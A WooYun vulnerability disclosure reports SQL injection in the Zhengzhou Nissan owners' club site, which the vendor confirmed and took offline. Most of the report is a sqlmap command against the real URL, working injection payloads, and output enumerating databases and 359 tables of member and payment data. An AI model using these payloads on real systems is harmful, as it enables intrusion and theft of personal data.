当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154146

漏洞标题:郑州日产车主俱乐部SQL注入/359个表/200W会员信息/10W交易信息

相关厂商:郑州日产汽车有限公司

漏洞作者: 路人甲

提交时间:2015-11-18 17:45

修复时间:2015-11-24 17:10

公开时间:2015-11-24 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-18: 细节已通知厂商并且等待厂商处理中
2015-11-20: 厂商已经确认,细节仅向厂商公开
2015-11-24: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

详细说明:

sqlmap -u "http://club.zznissan.com.cn/fenbu/album.php?cls=1'%22&keyword=&page=2" --dbms=mysql --tamper=between --level=5 --risk=3


参数:cls


1.jpg


2.jpg


3.jpg


4.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cls
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: cls=-2754' OR (7970=7970) AND 'ABtb'='ABtb&keyword=&page=2
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
Payload: cls=-2765' OR (SELECT 7906 FROM(SELECT COUNT(*),CONCAT(0x716a697271,(SELECT (CASE WHEN (7906=7906) THEN 1 ELSE 0 END)),0x716e6a7371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EZrq'='EZrq&keyword=&page=2
Type: UNION query
Title: MySQL UNION query (random number) - 11 columns
Payload: cls=-1976' UNION ALL SELECT CONCAT(0x716a697271,0x706a744672674c484469,0x716e6a7371),2675,2675,2675,2675,2675,2675,2675,2675,2675,2675#&keyword=&page=2
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: cls=-4280' OR 1288=SLEEP(5) AND 'Ydqy'='Ydqy&keyword=&page=2
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current database: 'paladinclub'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cls
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: cls=-2754' OR (7970=7970) AND 'ABtb'='ABtb&keyword=&page=2
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
Payload: cls=-2765' OR (SELECT 7906 FROM(SELECT COUNT(*),CONCAT(0x716a697271,(SELECT (CASE WHEN (7906=7906) THEN 1 ELSE 0 END)),0x716e6a7371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EZrq'='EZrq&keyword=&page=2
Type: UNION query
Title: MySQL UNION query (random number) - 11 columns
Payload: cls=-1976' UNION ALL SELECT CONCAT(0x716a697271,0x706a744672674c484469,0x716e6a7371),2675,2675,2675,2675,2675,2675,2675,2675,2675,2675#&keyword=&page=2
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: cls=-4280' OR 1288=SLEEP(5) AND 'Ydqy'='Ydqy&keyword=&page=2
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current user: 'paladinclub@localhost'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cls
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: cls=-2754' OR (7970=7970) AND 'ABtb'='ABtb&keyword=&page=2
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
Payload: cls=-2765' OR (SELECT 7906 FROM(SELECT COUNT(*),CONCAT(0x716a697271,(SELECT (CASE WHEN (7906=7906) THEN 1 ELSE 0 END)),0x716e6a7371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EZrq'='EZrq&keyword=&page=2
Type: UNION query
Title: MySQL UNION query (random number) - 11 columns
Payload: cls=-1976' UNION ALL SELECT CONCAT(0x716a697271,0x706a744672674c484469,0x716e6a7371),2675,2675,2675,2675,2675,2675,2675,2675,2675,2675#&keyword=&page=2
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: cls=-4280' OR 1288=SLEEP(5) AND 'Ydqy'='Ydqy&keyword=&page=2
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
available databases [3]:
[*] information_schema
[*] paladinclub
[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cls
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: cls=-2754' OR (7970=7970) AND 'ABtb'='ABtb&keyword=&page=2
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
Payload: cls=-2765' OR (SELECT 7906 FROM(SELECT COUNT(*),CONCAT(0x716a697271,(SELECT (CASE WHEN (7906=7906) THEN 1 ELSE 0 END)),0x716e6a7371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EZrq'='EZrq&keyword=&page=2
Type: UNION query
Title: MySQL UNION query (random number) - 11 columns
Payload: cls=-1976' UNION ALL SELECT CONCAT(0x716a697271,0x706a744672674c484469,0x716e6a7371),2675,2675,2675,2675,2675,2675,2675,2675,2675,2675#&keyword=&page=2
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: cls=-4280' OR 1288=SLEEP(5) AND 'Ydqy'='Ydqy&keyword=&page=2
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: paladinclub
[359 tables]
Database: paladinclub
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| memberawoke | 2997714 |
| oneq_missiondata | 1822433 |
| memberpay | 174554 |
| membermodify | 139384 |
| pw_members | 100189 |
| pw_usercache | 87618 |
| pw_members123 | 74523 |
| pw_memberdata | 63917 |
| carinfo | 55829 |
| memberinfo | 51367 |
| pw_ms_messages | 51267 |
| pw_ms_relations | 45781 |
| pw_ms_configs | 39840 |
| pw_merge_posts | 38559 |
| pw_posts | 38559 |
| pw_membersnew | 38251 |
| pw_members0705 | 38249 |
| east2008_loginrecord | 36497 |
| east2008_answer | 32599 |
| pw_msg | 28369 |
| pw_msgc | 28368 |
| pw_memberinfo | 26760 |
| pw_adminlog | 22134 |
| pw_datanalyse | 18747 |
| dakar2006 | 14392 |
| dakar20061 | 14391 |
| dakar20062 | 14091 |
| dakar20063 | 14091 |
| pw_attachs | 13050 |
| fankui | 12826 |
| pw_member_behavior_statistic | 10677 |
| pw_merge_tmsgs | 10531 |
| pw_tmsgs | 10531 |
| pw_threads | 10526 |
| eastgames_notify | 7550 |
| pw_medal_award | 6863 |
| memberinfo_t | 6236 |
| imagefile | 5411 |
| pw_cache_members | 5315 |
| pw_statistics_daily | 5180 |
| east2008_user | 4739 |
| pw_membercredit | 3737 |
| pw_permission | 3736 |
| pw_areas | 3550 |
| pw_ipstates | 3235 |
| pw_school | 2428 |
| article | 2370 |
| pw_wordfb | 2002 |
| pw_ucnotify | 1968 |
| pw_weibo_relations | 1494 |
| pw_filter | 1472 |
| pw_tags | 1442 |
| pw_weibo_content | 1141 |
| pw_forumlog | 1110 |
| oneq_mission | 1105 |
| memberinfo_bak | 1049 |
| pw_elements | 908 |
| membermark | 808 |
| pw_ms_replies | 663 |
| pw_ms_searchs | 658 |
| lmsj | 603 |
| dakar | 537 |
| memberinfo1 | 456 |
| pw_config | 379 |
| pw_attention | 345 |
| pw_activityfield | 340 |
| hk_article | 315 |
| wqw_city | 301 |
| pw_invoke | 300 |
| pw_invokepiece | 246 |
| hk_class | 232 |
| imgcategory | 232 |
| pw_friends | 183 |
| pw_cachedata | 145 |
| pw_recycle | 142 |
| pw_cache | 137 |
| pw_topicfield | 128 |
| czhd_memberinfo | 114 |
| pw_medal_log | 114 |
| pw_smiles | 111 |
| pw_pageinvoke | 110 |
| pw_hack | 99 |
| pw_space | 90 |
| xunlianying | 85 |
| userfun | 70 |
| pw_diary | 69 |
| pw_poststopped | 67 |
| pw_clientorder | 65 |
| pw_cnphoto | 54 |
| category | 52 |
| pw_ouserdata | 51 |
| pw_medal_apply | 48 |
| pw_nav | 46 |
| user_bak | 41 |
| huikan | 36 |
| pw_administrators | 36 |
| pw_report | 36 |
| `user` | 34 |
| pw_draft | 34 |
| pw_tagdata | 33 |
| prov | 31 |
| pw_advert | 31 |
| pw_collection | 31 |
| wqw_prov | 31 |
| pw_pcfield | 30 |
| pw_company | 28 |
| pw_user_career | 28 |
| pw_block | 27 |
| pw_help | 27 |
| clubinfo | 26 |
| pw_cnalbum | 23 |
| pw_membertags_relations | 23 |
| pw_pinglog | 23 |
| east2008_question | 22 |
| pw_rateconfig | 22 |
| pw_write_smiles | 22 |
| pw_forumdata | 21 |
| pw_forums | 21 |
| pw_modehot | 21 |
| pw_tpl | 19 |
| file_flow | 18 |
| pw_medal_info | 18 |
| pw_usergroups | 18 |
| khly_hz | 17 |
| pw_activitymodel | 17 |
| pw_membertags | 17 |
| pw_topictype | 16 |
| pw_voter | 16 |
| pw_searchforum | 15 |
| pw_user_education | 15 |
| file_info | 14 |
| east2008pho_loginrecord | 13 |
| pw_favors | 13 |
| pw_forumsextra | 13 |
| xly_user | 13 |
| pw_tools | 12 |
| pw_customfield | 11 |
| pw_medalslogs | 11 |
| pw_job | 10 |
| pw_medalinfo | 10 |
| pw_overprint | 10 |
| paladin_awards | 9 |
| pw_home | 9 |
| usergroup | 9 |
| pw_plan | 8 |
| pw_styles | 8 |
| pw_topicmodel | 8 |
| pw_cnskin | 7 |
| pw_debateclass | 7 |
| pw_stopicblock | 7 |
| pw_cnlevel | 6 |
| pw_medaluser | 6 |
| pw_polls | 6 |
| pw_stamp | 6 |
| pw_tpltype | 6 |
| cj_jl | 5 |
| pw_actions | 5 |
| pw_banuser | 5 |
| pw_datastore | 5 |
| pw_stopiccategory | 5 |
| pw_topiccate | 5 |
| a_user | 4 |
| file_share | 4 |
| pw_activitycate | 4 |
| pw_adminset | 4 |
| pw_cnclass | 3 |
| pw_cnstyles | 3 |
| pw_kmd_spread | 3 |
| topic | 3 |
| a_customers | 2 |
| a_floor | 2 |
| dakar_config | 2 |
| east2008pho_user | 2 |
| pw_channel | 2 |
| pw_comment | 2 |
| pw_diarytype | 2 |
| pw_forumtype | 2 |
| pw_modules | 2 |
| pw_portalpage | 2 |
| pw_searchstatistic | 2 |
| pw_sharelinkstype | 2 |
| `language` | 1 |
| pw_activity | 1 |
| pw_actmember | 1 |
| pw_bbsinfo | 1 |
| pw_cmembers | 1 |
| pw_colonys | 1 |
| pw_credits | 1 |
| pw_filter_class | 1 |
| pw_friendtype | 1 |
| pw_invitecode | 1 |
| pw_mpageconfig | 1 |
| pw_oboard | 1 |
| pw_pidtmp | 1 |
| pw_postcate | 1 |
| pw_task | 1 |
| pw_toollog | 1 |
+------------------------------+---------+

漏洞证明:

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-11-20 11:16

厂商回复:

漏洞已收到,谢谢!

最新状态:

2015-11-24:废弃的这套系统已经下线处理。

2015-11-24:废弃的这套系统已经下线处理。


漏洞评价:

评论

  1. 2015-11-19 01:03 | 我不是冰冰 ( 普通白帽子 | Rank:125 漏洞数:34 | 直到最后一刻、都不可以放弃希望、)

    真巧啊